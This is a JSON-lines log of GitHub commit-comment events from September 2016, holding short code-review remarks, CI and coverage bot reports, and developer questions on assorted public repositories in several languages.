{"id":"4607821600","type":"CommitCommentEvent","actor":{"login":"gmar1274"},"repo":{"name":"gmar1274/FTNTransport"},"payload":{"comment":{"id":19144273,"position":null,"line":null,"path":null,"commit_id":"a57e89d641bf08ef249d2e4b1c75e1b5e5865e18","created_at":"2016-09-23T10:38:42Z","updated_at":"2016-09-23T10:38:42Z","body":"POST connection works. Need to parse the JSON server response. then populate the response to list view."}},"created_at":"2016-09-23T10:38:42Z"}
{"id":"4607823164","type":"CommitCommentEvent","actor":{"login":"freddymartinez9"},"repo":{"name":"freddymartinez9/lucyparsons.github.io"},"payload":{"comment":{"id":19144278,"position":16,"line":18,"path":"fullaudit/visualization/process.py","commit_id":"432088d43453d96087d0f82e0d0027adf1ccc8c8","created_at":"2016-09-23T10:39:06Z","updated_at":"2016-09-23T10:39:06Z","body":"fixed in https://github.com/freddymartinez9/lucyparsons.github.io/commit/264a85ea88c55a389a70338ecb2982c6e4ce418a"}},"created_at":"2016-09-23T10:39:06Z"}
{"id":"4607838137","type":"CommitCommentEvent","actor":{"login":"szszszsz"},"repo":{"name":"privacyidea/privacyideaadm"},"payload":{"comment":{"id":19144312,"position":98,"line":97,"path":"privacyideautils/nitrokey.py","commit_id":"1d840ae834f1c59da7b01421c5280f28d2b94f96","created_at":"2016-09-23T10:42:47Z","updated_at":"2016-09-23T10:42:47Z","body":"Hi! I believe here should be `if not r == 0:` otherwise on wrong admin PIN application will continue."}},"created_at":"2016-09-23T10:42:47Z"}
{"id":"4607841274","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19144318,"position":null,"line":null,"path":null,"commit_id":"f7858f0a64bd769a142b9bdcd9fdcc239f10e482","created_at":"2016-09-23T10:43:34Z","updated_at":"2016-09-23T10:43:34Z","body":"[Code coverage](https://157-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-23T10:43:34Z"}
{"id":"4607843122","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19144328,"position":null,"line":null,"path":null,"commit_id":"6c5740011c2b1169c869e6f77f36b5ae26534098","created_at":"2016-09-23T10:44:02Z","updated_at":"2016-09-23T10:44:02Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: Tests Failed (2197 of 2495 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c5740011c2b1169c869e6f77f36b5ae26534098-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c5740011c2b1169c869e6f77f36b5ae26534098-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.06%25-red.svg)</a> \n"}},"created_at":"2016-09-23T10:44:02Z"}
{"id":"4607843272","type":"CommitCommentEvent","actor":{"login":"Ayuto"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19144329,"position":null,"line":null,"path":null,"commit_id":"f4061002ab6088f3b01f98af5ac99526bf73cc4b","created_at":"2016-09-23T10:44:04Z","updated_at":"2016-09-23T10:44:04Z","body":"Yes, I also agree with @Mahi. "}},"created_at":"2016-09-23T10:44:04Z"}
{"id":"4607843571","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19144330,"position":null,"line":null,"path":null,"commit_id":"b2c829a07c2ae0c90e223df991140f1ff9ae99f7","created_at":"2016-09-23T10:44:08Z","updated_at":"2016-09-23T10:44:08Z","body":"[Code coverage](https://158-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-23T10:44:08Z"}
{"id":"4607844614","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19144331,"position":3,"line":20,"path":"correction-septembre-2016/paul-gueguen/teapot.py","commit_id":"aabd72fbc8046008615dddc437ecf1d121a796da","created_at":"2016-09-23T10:44:22Z","updated_at":"2016-09-23T10:44:22Z","body":"L’argument `segs` mérite d’être plus explicite"}},"created_at":"2016-09-23T10:44:22Z"}
{"id":"4607845550","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19144332,"position":8,"line":62,"path":"correction-septembre-2016/paul-gueguen/teapot_gui.py","commit_id":"aabd72fbc8046008615dddc437ecf1d121a796da","created_at":"2016-09-23T10:44:36Z","updated_at":"2016-09-23T10:44:36Z","body":"Un peu trop de lignes vides"}},"created_at":"2016-09-23T10:44:36Z"}
{"id":"4607847266","type":"CommitCommentEvent","actor":{"login":"No1KnowMe"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19144333,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-23T10:45:01Z","updated_at":"2016-09-23T10:45:01Z","body":"When I push start , it doesn't show anything ."}},"created_at":"2016-09-23T10:45:01Z"}
{"id":"4607847397","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19144334,"position":13,"line":67,"path":"correction-septembre-2016/paul-gueguen/teapot_gui.py","commit_id":"aabd72fbc8046008615dddc437ecf1d121a796da","created_at":"2016-09-23T10:45:03Z","updated_at":"2016-09-23T10:45:03Z","body":"Pas besoin de caster le `.text()` en `int`, il y `.value()` pour ca"}},"created_at":"2016-09-23T10:45:03Z"}
{"id":"4607848894","type":"CommitCommentEvent","actor":{"login":"mrsmallbee"},"repo":{"name":"jMonkeyEngine/wiki"},"payload":{"comment":{"id":19144340,"position":null,"line":null,"path":null,"commit_id":"f8cbd1e27612ceea83d100ccc5c233e7a2fd406c","created_at":"2016-09-23T10:45:26Z","updated_at":"2016-09-23T10:45:26Z","body":"this is chinese version"}},"created_at":"2016-09-23T10:45:26Z"}
{"id":"4607849345","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19144342,"position":33,"line":90,"path":"correction-septembre-2016/paul-gueguen/teapot_gui.py","commit_id":"aabd72fbc8046008615dddc437ecf1d121a796da","created_at":"2016-09-23T10:45:32Z","updated_at":"2016-09-23T10:45:32Z","body":"PEP8 stipule qu'il faut toujours une ligne vide à la fin d'un fichier"}},"created_at":"2016-09-23T10:45:32Z"}
{"id":"4607852619","type":"CommitCommentEvent","actor":{"login":"viciious"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19144350,"position":8,"line":132,"path":"lib/mapObjects/CRewardableObject.cpp","commit_id":"bb05db90e53183bd67524ca54d5c317e1f5aa4fb","created_at":"2016-09-23T10:46:22Z","updated_at":"2016-09-23T10:46:22Z","body":"Possibly add a break statement here?"}},"created_at":"2016-09-23T10:46:22Z"}
{"id":"4607853025","type":"CommitCommentEvent","actor":{"login":"brantlane"},"repo":{"name":"brantlane/FirstTest"},"payload":{"comment":{"id":19144354,"position":null,"line":null,"path":null,"commit_id":"d3357650735fbcc017001b9111bfd0cd4d596a29","created_at":"2016-09-23T10:46:29Z","updated_at":"2016-09-23T10:46:29Z","body":"clear"}},"created_at":"2016-09-23T10:46:29Z"}
{"id":"4607853384","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19144355,"position":43,"line":43,"path":"issue11-2/result.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-23T10:46:36Z","updated_at":"2016-09-23T10:46:36Z","body":"ループ処理の埋め込み方について、<?php endwhile; ?>を使う方向かと考えて下記のように書いたのですがうまく動きません。どのあたりに間違いが有りますでしょうか？\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18783359/509a928e-81c6-11e6-87fd-60537c5fceac.png)\r\n"}},"created_at":"2016-09-23T10:46:36Z"}
{"id":"4607854560","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19144357,"position":null,"line":null,"path":null,"commit_id":"f453cad0812d710ccae10765dda289d5e1e58e8b","created_at":"2016-09-23T10:46:53Z","updated_at":"2016-09-23T10:46:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1141](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14097&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 246, ignored: 3 Build time: 00:11:12"}},"created_at":"2016-09-23T10:46:53Z"}
{"id":"4607855128","type":"CommitCommentEvent","actor":{"login":"smudge202"},"repo":{"name":"stajs/SpecFlow.NetCore"},"payload":{"comment":{"id":19144358,"position":40,"line":43,"path":"src/SpecFlow.NetCore/Fixer.cs","commit_id":"0560286f6bd9e17f905c570a31b9a2a2e06c55e0","created_at":"2016-09-23T10:47:02Z","updated_at":"2016-09-23T10:47:02Z","body":"I wouldn't throw here. Let it fall through to the default path instead?"}},"created_at":"2016-09-23T10:47:02Z"}
{"id":"4607862940","type":"CommitCommentEvent","actor":{"login":"javiersantos"},"repo":{"name":"javiersantos/BottomDialogs"},"payload":{"comment":{"id":19144369,"position":null,"line":null,"path":null,"commit_id":"33c4924d7e024a7e3b99d3b816d3d4e42017e4c6","created_at":"2016-09-23T10:48:53Z","updated_at":"2016-09-23T10:48:53Z","body":"Fix #8 too"}},"created_at":"2016-09-23T10:48:53Z"}
{"id":"4607863610","type":"CommitCommentEvent","actor":{"login":"RealyUniqueName"},"repo":{"name":"RealyUniqueName/haxe"},"payload":{"comment":{"id":19144372,"position":null,"line":null,"path":null,"commit_id":"d0d7b331e6d07b2c9736c2bd3cd79e6076ad68f7","created_at":"2016-09-23T10:49:05Z","updated_at":"2016-09-23T10:49:05Z","body":"I can't think of a simple enough regex for these cases which will not look like a cryptogram :)\r\nAny ideas?\r\n\r\nAlso i think the vast majority of cases will fall into `if (Global.is_numeric(x)) return Global.intval(x, 10);` and `var result = Global.floatval(x); if (result != 0) return result;` branches. Which should be faster than any regex."}},"created_at":"2016-09-23T10:49:05Z"}
{"id":"4607865744","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson1"},"payload":{"comment":{"id":19144373,"position":1,"line":1,"path":"task1.py","commit_id":"84c70d04efcc7130b5d33424075580eafa74a266","created_at":"2016-09-23T10:49:37Z","updated_at":"2016-09-23T10:49:37Z","body":"Looks good to me. \r\nMinor style: no need to have space between function name and brackets"}},"created_at":"2016-09-23T10:49:37Z"}
{"id":"4607865783","type":"CommitCommentEvent","actor":{"login":"Yoric"},"repo":{"name":"Yoric/yoric.github.io"},"payload":{"comment":{"id":19144374,"position":66,"line":66,"path":"_posts/2016-09-19-Extracting-text-from-images-is-not-easy-who-would-have-guessed.adoc","commit_id":"597f725196378f4d94e071c5f2a2e635601a22cf","created_at":"2016-09-23T10:49:38Z","updated_at":"2016-09-23T10:49:38Z","body":"Thanks, fixed."}},"created_at":"2016-09-23T10:49:38Z"}
{"id":"4607866030","type":"CommitCommentEvent","actor":{"login":"tomasky"},"repo":{"name":"scrooloose/nerdtree"},"payload":{"comment":{"id":19144375,"position":6,"line":137,"path":"README.markdown","commit_id":"f173f62c9af909ed9ecdbeb52cb4d20bb41a632c","created_at":"2016-09-23T10:49:41Z","updated_at":"2016-09-23T10:49:41Z","body":"The arrow symbols  change broken me with ubuntu ,it`s so ugly"}},"created_at":"2016-09-23T10:49:41Z"}
{"id":"4607866679","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19144379,"position":20,"line":20,"path":"src/main/java/medic/gateway/alert/GatewayEventLogFragment.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-23T10:49:50Z","updated_at":"2016-09-23T10:49:50Z","body":"There's a standard Android class called `Log`: https://developer.android.com/reference/android/util/Log.html"}},"created_at":"2016-09-23T10:49:50Z"}
{"id":"4607869754","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19144388,"position":51,"line":51,"path":"src/main/java/medic/gateway/alert/GatewayEventLogFragment.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-23T10:50:37Z","updated_at":"2016-09-23T10:50:37Z","body":"Could just start abbreviating things which aren't top-level classes, e.g. `GELECursorAdapter`."}},"created_at":"2016-09-23T10:50:37Z"}
{"id":"4607871939","type":"CommitCommentEvent","actor":{"login":"dorkbox"},"repo":{"name":"dorkbox/SystemTray"},"payload":{"comment":{"id":19144394,"position":null,"line":null,"path":null,"commit_id":"3d8459ecc377e9f7cb49d4a2856bf4f328607775","created_at":"2016-09-23T10:51:10Z","updated_at":"2016-09-23T10:51:10Z","body":"Not entirely accident ... just not enough time to get SWT binaries built as part of the build process.. :/  I'll have it fixed when the release hits."}},"created_at":"2016-09-23T10:51:10Z"}
{"id":"4607872438","type":"CommitCommentEvent","actor":{"login":"lury"},"repo":{"name":"pixers/salesmanago-api"},"payload":{"comment":{"id":19144395,"position":35,"line":43,"path":"src/Pixers/SalesManagoAPI/Service/ContactService.php","commit_id":"9eca21d042eba40e1c20eca3ab4d93366e9c5605","created_at":"2016-09-23T10:51:17Z","updated_at":"2016-09-23T10:51:17Z","body":"Upsert is not delete. previous version was fine."}},"created_at":"2016-09-23T10:51:17Z"}
{"id":"4607872995","type":"CommitCommentEvent","actor":{"login":"peteringram0"},"repo":{"name":"jackfranklin/html-dist"},"payload":{"comment":{"id":19144397,"position":null,"line":null,"path":null,"commit_id":"22d3da538e46c2d423d773cf21c99f7af1572b2e","created_at":"2016-09-23T10:51:25Z","updated_at":"2016-09-23T10:51:25Z","body":"This is awesome, thanks @jackfranklin. Are you able to give an example config in the new format please?"}},"created_at":"2016-09-23T10:51:25Z"}
{"id":"4607873336","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson1"},"payload":{"comment":{"id":19144398,"position":1,"line":1,"path":"task2.py","commit_id":"84c70d04efcc7130b5d33424075580eafa74a266","created_at":"2016-09-23T10:51:30Z","updated_at":"2016-09-23T10:51:30Z","body":"looks good to me"}},"created_at":"2016-09-23T10:51:30Z"}
{"id":"4607878140","type":"CommitCommentEvent","actor":{"login":"cornelinux"},"repo":{"name":"privacyidea/privacyideaadm"},"payload":{"comment":{"id":19144405,"position":98,"line":97,"path":"privacyideautils/nitrokey.py","commit_id":"1d840ae834f1c59da7b01421c5280f28d2b94f96","created_at":"2016-09-23T10:52:41Z","updated_at":"2016-09-23T10:52:41Z","body":"You are right. The error would also make no sense. Can you open an issue or send a PR?"}},"created_at":"2016-09-23T10:52:41Z"}
{"id":"4607879706","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson1"},"payload":{"comment":{"id":19144411,"position":1,"line":1,"path":"task3.py","commit_id":"84c70d04efcc7130b5d33424075580eafa74a266","created_at":"2016-09-23T10:53:03Z","updated_at":"2016-09-23T10:53:03Z","body":"looks good to me"}},"created_at":"2016-09-23T10:53:03Z"}
{"id":"4607880785","type":"CommitCommentEvent","actor":{"login":"leonardocintra-luizalabs"},"repo":{"name":"leonardocintra/python-pagseguro"},"payload":{"comment":{"id":19144415,"position":null,"line":null,"path":null,"commit_id":"c77ed71c1888988243e542dd82c20583bb717b47","created_at":"2016-09-23T10:53:19Z","updated_at":"2016-09-23T10:53:19Z","body":"Obrigado @rochacbruno "}},"created_at":"2016-09-23T10:53:19Z"}
{"id":"4607880975","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson1"},"payload":{"comment":{"id":19144416,"position":17,"line":17,"path":"task3.py","commit_id":"84c70d04efcc7130b5d33424075580eafa74a266","created_at":"2016-09-23T10:53:22Z","updated_at":"2016-09-23T10:53:22Z","body":"minor stype: PEP8: no newline at the end of file"}},"created_at":"2016-09-23T10:53:22Z"}
{"id":"4607881707","type":"CommitCommentEvent","actor":{"login":"stajs"},"repo":{"name":"stajs/SpecFlow.NetCore"},"payload":{"comment":{"id":19144419,"position":40,"line":43,"path":"src/SpecFlow.NetCore/Fixer.cs","commit_id":"0560286f6bd9e17f905c570a31b9a2a2e06c55e0","created_at":"2016-09-23T10:53:33Z","updated_at":"2016-09-23T10:53:33Z","body":"The first cut had it falling through, but it felt wrong - I thought if you had the environment variable set, you would want to know it isn't right?"}},"created_at":"2016-09-23T10:53:33Z"}
{"id":"4607882155","type":"CommitCommentEvent","actor":{"login":"kba"},"repo":{"name":"UB-Mannheim/hocr-tools"},"payload":{"comment":{"id":19144422,"position":null,"line":null,"path":null,"commit_id":"a709b94c4fa120f19b47c4470a0646468ac17ba4","created_at":"2016-09-23T10:53:40Z","updated_at":"2016-09-23T10:53:40Z","body":"Why make them executable? It's possible but I would not recommend it since this requires the shebang to be properly parsed and PATH set up before and can cause issues if tsht is installed system-wide but should be used with the local tsht script for consistency."}},"created_at":"2016-09-23T10:53:40Z"}
{"id":"4607891553","type":"CommitCommentEvent","actor":{"login":"kuc"},"repo":{"name":"dorkbox/SystemTray"},"payload":{"comment":{"id":19144444,"position":null,"line":null,"path":null,"commit_id":"3d8459ecc377e9f7cb49d4a2856bf4f328607775","created_at":"2016-09-23T10:55:57Z","updated_at":"2016-09-23T10:55:57Z","body":"Never mind, you _removed_ those `.class` files in this commit, not added them 😃 "}},"created_at":"2016-09-23T10:55:57Z"}
{"id":"4607893077","type":"CommitCommentEvent","actor":{"login":"ElieKassis"},"repo":{"name":"ISSAE/smb214-2016"},"payload":{"comment":{"id":19144449,"position":null,"line":null,"path":null,"commit_id":"46e3418ec0e1000672d9073db2cb34284517fd1f","created_at":"2016-09-23T10:56:21Z","updated_at":"2016-09-23T10:56:21Z","body":"[Elie Sarkis](https://github.com/ElieKassis/Java-Card)\r\nC'est Elie Kassis et non pas Elie Sarkis"}},"created_at":"2016-09-23T10:56:21Z"}
{"id":"4607894993","type":"CommitCommentEvent","actor":{"login":"ivanmish"},"repo":{"name":"devmanorg/2_wallie_how_are_you"},"payload":{"comment":{"id":19144453,"position":null,"line":null,"path":null,"commit_id":"4b8c39e9b91e5f6626698b5856f4fcf7926915b5","created_at":"2016-09-23T10:56:51Z","updated_at":"2016-09-23T10:56:51Z","body":"в последней строчке сделал \" print(action) \"и программа заработала\r\n"}},"created_at":"2016-09-23T10:56:51Z"}
{"id":"4607903039","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19144466,"position":43,"line":43,"path":"issue11-2/result.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-23T10:58:52Z","updated_at":"2016-09-23T10:58:52Z","body":"一見したところでは、\r\nwhile文の書き方に問題があるような気がしております({break;} の部分で閉じてしまっているように見えます。)。\r\n\r\n「while endwhile php」で検索して書き方をもう一度確認してみましょう(PHPマニュアルの例などを参考に)。\r\n\r\nまた、while(1)というのはどこかを参考にされた書き方でしょうか。\r\nhttp://d.hatena.ne.jp/erinashanti/20130403/p1\r\nこちらの解説2のところを参考にwhileの条件部分を書き換えてみるのも良い気がしたします(今回の問題とは直接関係はないと思っています)。"}},"created_at":"2016-09-23T10:58:52Z"}
{"id":"4607904623","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson1"},"payload":{"comment":{"id":19144472,"position":19,"line":19,"path":"task4.py","commit_id":"84c70d04efcc7130b5d33424075580eafa74a266","created_at":"2016-09-23T10:59:16Z","updated_at":"2016-09-23T10:59:16Z","body":"lines 19-24 do nothing useful and need to be removed"}},"created_at":"2016-09-23T10:59:16Z"}
{"id":"4607905151","type":"CommitCommentEvent","actor":{"login":"ivanmish"},"repo":{"name":"devmanorg/2_wallie_how_are_you"},"payload":{"comment":{"id":19144473,"position":null,"line":null,"path":null,"commit_id":"4b8c39e9b91e5f6626698b5856f4fcf7926915b5","created_at":"2016-09-23T10:59:24Z","updated_at":"2016-09-23T10:59:24Z","body":"в последней строке сделал   \"print (action)\" и программа заработала"}},"created_at":"2016-09-23T10:59:24Z"}
{"id":"4607905720","type":"CommitCommentEvent","actor":{"login":"Melevir"},"repo":{"name":"devmanorg/2_wallie_how_are_you"},"payload":{"comment":{"id":19144474,"position":null,"line":null,"path":null,"commit_id":"4b8c39e9b91e5f6626698b5856f4fcf7926915b5","created_at":"2016-09-23T10:59:33Z","updated_at":"2016-09-23T10:59:33Z","body":"Хорошо, осталось форкнуть репозиторий и поселить в нём правильную версию кода. Как это сделать, написано в задаче."}},"created_at":"2016-09-23T10:59:33Z"}
{"id":"4607906351","type":"CommitCommentEvent","actor":{"login":"khawkins98"},"repo":{"name":"ebiwd/EBI-Pattern-library"},"payload":{"comment":{"id":19144476,"position":null,"line":null,"path":null,"commit_id":"58ae88683015d4a48f4a7cabbca533cd7ba5e012","created_at":"2016-09-23T10:59:43Z","updated_at":"2016-09-23T10:59:43Z","body":"For #6"}},"created_at":"2016-09-23T10:59:43Z"}
{"id":"4607908896","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19144481,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-23T11:00:19Z","updated_at":"2016-09-23T11:00:19Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.177](http://build.clear-measure.com/viewLog.html?buildId=10649&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-23T11:00:19Z"}
{"id":"4607910281","type":"CommitCommentEvent","actor":{"login":"osoner"},"repo":{"name":"Countly/countly-server"},"payload":{"comment":{"id":19144486,"position":null,"line":null,"path":null,"commit_id":"347707d5f6ec05670dddbd7aefa950aa63c59dab","created_at":"2016-09-23T11:00:39Z","updated_at":"2016-09-23T11:00:39Z","body":"@waiterZen Please don't use ` in any place, use ' instead"}},"created_at":"2016-09-23T11:00:39Z"}
{"id":"4607914849","type":"CommitCommentEvent","actor":{"login":"Tee7even"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19144499,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-23T11:01:44Z","updated_at":"2016-09-23T11:01:44Z","body":"BTW, enums, while cannot be extended, can implement interfaces, what do you\nthink about generic Result interface?\n\n22 сент. 2016 г. 22:53 пользователь \"Влад Карпович\" <tee7e7en@gmail.com>\nнаписал:\n\n> I'm not talking only about \"Cancellable\", as I said any way to not repeat\n> the same code would be nice.\n>\n> 22 сент. 2016 г. 22:30 пользователь \"Tux\" <notifications@github.com>\n> написал:\n>\n>> Cancellable is useful *only* for binary \"cancelled\" states. It is not\n>> appropriate in all cases.\n>>\n>> Here's my justification for not using Cancellable:\n>>\n>>    - Some events are *conditionally* cancellable. Look at\n>>    PlayerLoginEvent for an example. It would be invalid to have a\n>>    cancelled event without a reason.\n>>    - Some events may have more than one result. I do not have any\n>>    examples for this one yet, however thanks to the event system's flexibility\n>>    I can add one.\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/minecrafter/voxelwind/commit/fe8d1cebd2aa3a61216b81524f39d76aea5ac99d#commitcomment-19134890>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AGc0WqV0OThz6vHHIrsz7RwB8iH-0S2Vks5qsslIgaJpZM4KCwZ->\n>> .\n>>\n>\n"}},"created_at":"2016-09-23T11:01:44Z"}
{"id":"4607917685","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19144508,"position":5,"line":345,"path":"Makefile.in","commit_id":"98470ab608b8eb723a5c7403c47d0151affe1fb2","created_at":"2016-09-23T11:02:25Z","updated_at":"2016-09-23T11:02:25Z","body":"Thanks - I'd have given $(a) and $(b) better names while I was at it: but that's something I'd rather do when 100% certain what it's doing there. "}},"created_at":"2016-09-23T11:02:25Z"}
{"id":"4607919257","type":"CommitCommentEvent","actor":{"login":"johnsimons"},"repo":{"name":"Particular/ServiceControl"},"payload":{"comment":{"id":19144515,"position":194,"line":242,"path":"src/ServiceControl/Operations/Error/ProcessErrors.cs","commit_id":"fe6ec4362a3575cd259c8db6d49eb5c3e2ff4ccf","created_at":"2016-09-23T11:02:46Z","updated_at":"2016-09-23T11:02:46Z","body":"this can be static\r\n"}},"created_at":"2016-09-23T11:02:46Z"}
{"id":"4607921033","type":"CommitCommentEvent","actor":{"login":"Tee7even"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19144518,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-23T11:03:15Z","updated_at":"2016-09-23T11:03:15Z","body":"BTW, enums, while cannot be extended, can implement interfaces, what do you\r\nthink about generic Result interface?"}},"created_at":"2016-09-23T11:03:15Z"}
{"id":"4607922663","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19144522,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-23T11:03:40Z","updated_at":"2016-09-23T11:03:40Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.177](http://build.clear-measure.com/viewLog.html?buildId=10649&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:03:20"}},"created_at":"2016-09-23T11:03:40Z"}
{"id":"4607928340","type":"CommitCommentEvent","actor":{"login":"wittawatj"},"repo":{"name":"lopezpaz/randomized_dependence_coefficient"},"payload":{"comment":{"id":19144535,"position":19,"line":19,"path":"code/algorithms.r","commit_id":"181bb35104074252ce6a87ea5c86f77bf136e3f7","created_at":"2016-09-23T11:05:10Z","updated_at":"2016-09-23T11:05:10Z","body":"Shouldn't this line be something like 1 / (N-1)^2 * sum(sum(KH * t(LH))) ?"}},"created_at":"2016-09-23T11:05:10Z"}
{"id":"4607928428","type":"CommitCommentEvent","actor":{"login":"zpauly"},"repo":{"name":"zpauly/GitHub_Android"},"payload":{"comment":{"id":19144537,"position":null,"line":null,"path":null,"commit_id":"4926cb6cc12ba1da8cc346ded84fdb5a5509bb32","created_at":"2016-09-23T11:05:11Z","updated_at":"2016-09-23T11:05:11Z","body":"test comment for a commit"}},"created_at":"2016-09-23T11:05:11Z"}
{"id":"4607929527","type":"CommitCommentEvent","actor":{"login":"zpauly"},"repo":{"name":"zpauly/GitHub_Android"},"payload":{"comment":{"id":19144541,"position":null,"line":null,"path":null,"commit_id":"4926cb6cc12ba1da8cc346ded84fdb5a5509bb32","created_at":"2016-09-23T11:05:27Z","updated_at":"2016-09-23T11:05:27Z","body":"test comment for a commit"}},"created_at":"2016-09-23T11:05:27Z"}
{"id":"4607932879","type":"CommitCommentEvent","actor":{"login":"johnsimons"},"repo":{"name":"Particular/ServiceControl"},"payload":{"comment":{"id":19144551,"position":64,"line":60,"path":"src/ServiceControl/Infrastructure/SignalR/GlobalEventHandler.cs","commit_id":"fe6ec4362a3575cd259c8db6d49eb5c3e2ff4ccf","created_at":"2016-09-23T11:06:20Z","updated_at":"2016-09-23T11:06:20Z","body":"We really only have 2 types of Ts, so we could just init them once ?"}},"created_at":"2016-09-23T11:06:20Z"}
{"id":"4607934055","type":"CommitCommentEvent","actor":{"login":"mohankumart"},"repo":{"name":"mohankumart/algos"},"payload":{"comment":{"id":19144556,"position":14,"line":15,"path":"codingInterview/check_permutation.py","commit_id":"ea1cea4fd6874ba99b0008bf70ff0a643cc39e5e","created_at":"2016-09-23T11:06:37Z","updated_at":"2016-09-23T11:06:37Z","body":"Track duplicates"}},"created_at":"2016-09-23T11:06:37Z"}
{"id":"4607937278","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"c42f/Displaz.jl"},"payload":{"comment":{"id":19144565,"position":null,"line":null,"path":null,"commit_id":"33d0c17dad48c5c08f7a168c632d3f47f03640c1","created_at":"2016-09-23T11:07:25Z","updated_at":"2016-09-23T11:07:25Z","body":"it's also used in https://github.com/c42f/Displaz.jl/blob/33d0c17dad48c5c08f7a168c632d3f47f03640c1/deps/build.jl#L1, need to remove it there too"}},"created_at":"2016-09-23T11:07:25Z"}
{"id":"4607938605","type":"CommitCommentEvent","actor":{"login":"tokuhirom"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19144567,"position":null,"line":null,"path":null,"commit_id":"cd861155a55f1d449d977540910e9448e6067092","created_at":"2016-09-23T11:07:46Z","updated_at":"2016-09-23T11:07:46Z","body":"Is this still required? gradle 3.x still supports 6.x?"}},"created_at":"2016-09-23T11:07:46Z"}
